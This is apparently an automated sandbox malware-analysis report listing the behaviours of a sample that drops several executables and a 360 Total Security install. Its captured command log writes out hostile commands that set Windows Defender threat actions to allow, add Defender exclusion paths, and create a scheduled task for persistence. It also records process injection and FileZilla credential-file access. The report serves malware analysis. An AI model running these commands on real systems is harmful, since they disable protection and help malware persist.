CreateServiceW May 31, 2024, 7:34 a.m.	service_start_name: start_type: 1 password: display_name: 360Safe Anti Hacker Service filepath: C:\Program Files (x86)\1717128839_0\System32\Drivers\360AntiHacker64.sys service_name: 360AntiHacker filepath_r: System32\Drivers\360AntiHacker64.sys desired_access: 983551 service_handle: 0x0ebe76c8 error_control: 0 service_type: 1 service_manager_handle: 0x0ebe7998	1	247363272
CreateServiceW May 31, 2024, 7:34 a.m.	service_start_name: start_type: 1 password: display_name: 360AvFlt mini-filter driver filepath: C:\Windows\System32\drivers\360AvFlt.sys service_name: 360AvFlt filepath_r: C:\Windows\system32\drivers\360AvFlt.sys desired_access: 983103 service_handle: 0x0eba9018 error_control: 0 service_type: 2 service_manager_handle: 0x0eba94c8	1	247107608
CreateServiceW May 31, 2024, 7:34 a.m.	service_start_name: start_type: 1 password: display_name: 360netmon filepath: C:\Windows\System32\drivers\360netmon.sys service_name: 360netmon filepath_r: \??\C:\Windows\system32\drivers\360netmon.sys desired_access: 983103 service_handle: 0x0eba4f88 error_control: 1 service_type: 1 service_manager_handle: 0x0eba52a8	1	247091080
CreateServiceW May 31, 2024, 7:34 a.m.	service_start_name: start_type: 3 password: display_name: 360Box mini-filter driver filepath: C:\Windows\System32\drivers\360Box64.sys service_name: 360Box64 filepath_r: C:\Windows\system32\drivers\360Box64.sys desired_access: 983103 service_handle: 0x0ebe83e8 error_control: 0 service_type: 2 service_manager_handle: 0x0ebe7dd0	1	247366632
CreateServiceW May 31, 2024, 7:35 a.m.	service_start_name: start_type: 2 password: display_name: 360 Total Security filepath: C:\Program Files (x86)\1717128839_0\"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe" service_name: QHActiveDefense filepath_r: "C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe" desired_access: 983551 service_handle: 0x0047d490 error_control: 1 service_type: 16 service_manager_handle: 0x0047d508	1	4707472

Queries information on disks, possibly for anti-virtualization (2 events)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile May 31, 2024, 7:34 a.m.	create_disposition: 1 (FILE_OPEN) file_handle: 0x00000210 filepath: \??\PhysicalDrive0 desired_access: 0x00100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE) file_attributes: 0 () filepath_r: \??\PhysicalDrive0 create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 0 (FILE_SUPERSEDED) share_access: 3 (FILE_SHARE_READ\|FILE_SHARE_WRITE)	1	0	0
DeviceIoControl May 31, 2024, 7:34 a.m.	input_buffer: control_code: 2954240 () device_handle: 0x00000210 output_buffer: (§Lu~$ VBOX HARDDISK 1.0VBOX HARDDISK 1.0 42563736376264643664662d3931643864312032	1	1	0

Loads a driver (1 event)

Time & API	Arguments	Status	Return	Repeated
NtLoadDriver May 31, 2024, 7:34 a.m.	driver_service_name: \Registry\Machine\System\CurrentControlSet\Services\BAPIDRV	1	0	0

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (10 events)

wmi	Select * from AntiVirusProduct
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM Win32_Process
wmi	Select * From AntiVirusProduct
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	<INVALID POINTER>
wmi	SELECT * FROM Win32_Processor

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return
WriteProcessMemory May 31, 2024, 7:33 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#à"03 @@ @@3O@Ü`$3 H.text `.rsrcÜ@@@.reloc`(@B base_address: 0x0000000000400000 process_identifier: 1872 process_handle: 0x0000000000000218	1	1
WriteProcessMemory May 31, 2024, 7:33 a.m.	buffer: 03 base_address: 0x0000000000406000 process_identifier: 1872 process_handle: 0x0000000000000218	1	1
WriteProcessMemory May 31, 2024, 7:33 a.m.	buffer: @ base_address: 0x000000007efde008 process_identifier: 1872 process_handle: 0x0000000000000218	1	1
WriteProcessMemory May 31, 2024, 7:35 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $jä.øs·.øs·.øs·ep¶%øs·ev¶îøs·et¶/øs·ìy·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·ew¶6øs·eu¶/øs·er¶5øs·.ør·ùs·Ýzz¶2øs·Ýz·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà'¼\|m=Ð@`@8 8ÀX°8@X@ÐÜ6@.textÈ»¼ `.rdata2~ÐÀ@@.data0IP2@@À.rsrc8 r@@.relocXÀ@B base_address: 0x00400000 process_identifier: 3228 process_handle: 0x00000260	1	1
WriteProcessMemory May 31, 2024, 7:35 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3228 process_handle: 0x00000260	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory May 31, 2024, 7:33 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#à"03 @@ @@3O@Ü`$3 H.text `.rsrcÜ@@@.reloc`(@B base_address: 0x0000000000400000 process_identifier: 1872 process_handle: 0x0000000000000218	1	1	0
WriteProcessMemory May 31, 2024, 7:35 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $jä.øs·.øs·.øs·ep¶%øs·ev¶îøs·et¶/øs·ìy·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·ew¶6øs·eu¶/øs·er¶5øs·.ør·ùs·Ýzz¶2øs·Ýz·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà'¼\|m=Ð@`@8 8ÀX°8@X@ÐÜ6@.textÈ»¼ `.rdata2~ÐÀ@@.data0IP2@@À.rsrc8 r@@.relocXÀ@B base_address: 0x00400000 process_identifier: 3228 process_handle: 0x00000260	1	1	0

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW May 31, 2024, 7:30 a.m.	key_handle: 0x00000558 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Attempts to create or modify system certificates (6 events)

registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F8DB7E1C16F1FFD4AAAD4AAD8DFF0F2445184AEB\Blob
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob

Network activity contains more than one unique useragent (3 events)

process	axplont.exe	useragent
process	mpVxwmaUWkvooa27wKUZd6Do.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
process	360TS_Setup.exe	useragent	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3036 called NtSetContextThread to modify thread in remote process 3228
NtSetContextThread May 31, 2024, 7:35 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4406637 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 3228	1	0	0

Powershell script adds registry entries (1 event)

cmd

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" powershell start-process -windowstyle hidden gpupdate.exe /force"c:\users\test22\appdata\local\temp\1000005001\fileosn.exe" "c:\users\test22\appdata\local\temp\1b29d73536\axplont.exe" "c:\program files (x86)\360\total security\utils\powersaver.exe" /flightsigningforfiles /p c:\windows\system32 /m help.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" "c:\users\test22\appdata\local\temp\1000031001\newoff.exe" "c:\users\test22\pictures\vjkwgjajtkztcimr3quc8xcl.exe" c:\users\test22\pictures\1cp24gdx3ju3it5nevx8jpp9.exe /sschtasks /create /sc minute /mo 1 /tn newoff.exe /tr "c:\users\test22\appdata\local\temp\1000031001\newoff.exe" /f"c:\users\test22\pictures\1cp24gdx3ju3it5nevx8jpp9.exe" /sforfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" c:\users\test22\appdata\local\temp\1000285001\firstz.exe"c:\users\test22\appdata\local\temp\1000006001\lumma1234.exe" c:\users\test22\pictures\jgeieplypr5rfiasrd4jjg3x.exec:\users\test22\appdata\local\temp\1000005001\fileosn.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6"c:\users\test22\appdata\local\temp\1000004001\33333.exe" c:\users\test22\appdata\local\temp\1000009001\swizzzz.exec:\program files (x86)\360\total security\utils\powersaver.exe /flightsigning/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6"c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\1000020001\file300un.exe" -force /s "c:\program files (x86)\360\total security\menuex64.dll"/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6cmd /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"forfiles /p c:\windows\system32 /m ping.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"c:\users\test22\pictures\mpvxwmauwkvooa27wkuzd6do.exec:\users\test22\appdata\local\temp\1000004001\33333.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6c:\users\test22\appdata\local\temp\1b29d73536\axplont.exec:\windows\system32\gpupdate.exe /force c:\users\test22\documents\simpleadobe\zb5wqyhn0djjyq0cadepmad2.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"c:\users\test22\appdata\local\temp\1000006001\lumma1234.exec:\users\test22\appdata\local\temp\1000031001\newoff.exepowershell add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\1000020001\file300un.exe" -force"c:\windows\system32\regsvr32.exe" /s "c:\program files (x86)\360\total security\menuex64.dll""c:\users\test22\appdata\local\temp\1000285001\firstz.exe" c:\users\test22\pictures\vjkwgjajtkztcimr3quc8xcl.exe"c:\users\test22\appdata\local\temp\1000008001\gold.exe" "c:\windows\system32\schtasks.exe" /create /sc minute /mo 1 /tn newoff.exe /tr "c:\users\test22\appdata\local\temp\1000031001\newoff.exe" /f"c:\program files (x86)\360\total security\safemon\qhactivedefense.exe" /install"c:\users\test22\appdata\local\temp\1000009001\swizzzz.exe" c:\users\test22\appdata\local\temp\1000008001\gold.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6c:\windows\microsoft.net\framework\v4.0.30319\regasm.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" "c:\users\test22\pictures\mpvxwmauwkvooa27wkuzd6do.exe" .\install.exe /nqhxdiduqs "385118" /sc:\users\test22\appdata\local\temp\1000020001\file300un.exe"c:\windows\system32\gpupdate.exe" /force "c:\users\test22\appdata\local\temp\1000020001\file300un.exe" /c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6c:\windows\microsoft.net\framework\v4.0.30319\jsc.exe/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6/c powershell start-process -windowstyle hidden gpupdate.exe /force.\install.exe"c:\program files (x86)\1717128839_0\360ts_setup.exe" /c:ww.marketator.cpi20230405 /pmode:2 /s /promo:eyjib290dgltzsi6ijcilcjtzwrhbci6ijcilcjuzxdzijoimcisim9wzxjhijoinyisim9wzxjhx2lucyi6ijailcjwb3b1cci6ijcilcjyzw1pbmrlcii6ijcilcj1cgdyywrlx25vdyi6ijaifqo= /tsinstall

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Windows\System32\gpupdate.exe /force
parent_process	powershell.exe				martian_process	"C:\Windows\system32\gpupdate.exe" /force

Drops 196 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 196 events)

file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\endata\h_3.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\hi\deepscan\dsurls.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\endata\lm_1001.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\360DrvMgr\360LibDrvmgr.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\deepscan\dsconz.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\act.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\lang.lang
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\360drwht.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\pt\deepscan\ssr.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\uiitem.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\hookport_win10.cat
